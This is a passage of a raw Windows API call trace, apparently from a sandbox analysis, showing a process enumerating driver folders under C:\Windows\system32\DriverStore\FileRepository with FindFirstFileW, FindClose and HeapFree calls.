ftCreationTime.dwLowDateTime=0x3a37b312, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c32b82d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c32b82d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.641] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.641] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.641] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\keyboard.inf_amd64_neutral_0684fdc43059f486\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38f1968d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bc538e0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bc538e0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.642] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.643] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ks.inf_amd64_neutral_2b583ce4a6a029a1\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d0983c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f745a91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f745a91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.643] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.644] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\kscaptur.inf_amd64_neutral_6cb3fb6811a3f83d\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e720584, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.644] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.644] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ksfilter.inf_amd64_neutral_86311fdf78a07678\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e7b8b05, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.645] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.645] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41838b9f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x617683cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x617683cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.645] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.646] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418f7280, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61826aae, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61826aae, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.646] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.646] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4198f801, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6190b2ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6190b2ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.648] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.648] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_scsi.inf_amd64_neutral_cfbbf0b0b66ba280\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41a27d82, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x619efb31, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x619efb31, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.649] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.649] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.649] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\machine.inf_amd64_neutral_a2f120466549d68b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38b87586, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x45ea362b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x45ea362b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.652] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.653] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mchgr.inf_amd64_neutral_407146dba80d1566\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a1d83ef, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c2932ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c2932ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.655] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.656] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.656] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e8e9608, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60ac2ed5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60ac2ed5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.657] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.657] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm3com.inf_amd64_neutral_11abcf129a29fb9f\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x491c4fdf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e96a2d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e96a2d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.658] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.658] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x492a9820, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.658] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.658] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.658] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmadc.inf_amd64_neutral_62d6e6995428f9d0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4938e062, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.659] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.659] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5023e02e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bf5f562, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bf5f562, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.660] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.660] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.660] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmags64.inf_amd64_neutral_e68956e24e287714\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50394c90, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bfab822, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bfab822, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.661] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.664] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmairte.inf_amd64_neutral_0feacd08cb9c7fe3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494265e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671442f2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671442f2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.664] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.664] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa.inf_amd64_neutral_560c956da9bcd8f5\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494beb64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.670] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.670] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.670] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa3.inf_amd64_neutral_77e515342bd572cc\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495c9506, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.671] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.671] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.671] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496add48, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671905b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671905b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.671] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.671] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.671] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa5.inf_amd64_neutral_ea8128ac5da37eb9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4976c429, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671dc873, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671dc873, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.672] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.672] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwat.inf_amd64_neutral_213e93b5ced8b0fe\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498049aa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672029d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672029d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.672] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.673] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.673] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmar1.inf_amd64_neutral_b8ebf59556c3dbf0\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4989cf2b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67228b33, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67228b33, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.674] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.674] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.674] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarch.inf_amd64_neutral_4261401e3170ebfb\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4995b60d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67274df4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67274df4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.675] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarn.inf_amd64_neutral_fa693d8797766f49\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49a19cee, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6729af54, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6729af54, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.675] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.675] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.675] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmati.inf_amd64_neutral_ded8f26cdee953c3\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad83cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672e7215, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672e7215, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.676] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.676] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmatm2k.inf_amd64_neutral_64a8fb018ead55a7\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bbcc11, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x675226b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x675226b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.676] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaus.inf_amd64_neutral_5fa4270b9924b918\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49c55192, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6756e979, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6756e979, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.677] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmboca.inf_amd64_neutral_cc532ed7b3b5b5a9\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49d399d4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x677a9e1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x677a9e1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.678] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr002.inf_amd64_neutral_ce2134188ab21f59\\*", lpFindFileData=0x72aef0 | out: lpFindFileData=0x72aef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48c1db94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66db21eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66db21eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71da50 [0060.679] FindClose (in: hFindFile=0x71da50 | out: hFindFile=0x71da50) returned 1 [0060.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x72aef0 | out: hHeap=0x6e0000) returned 1 [0060.679] FindFirstFileW (in: 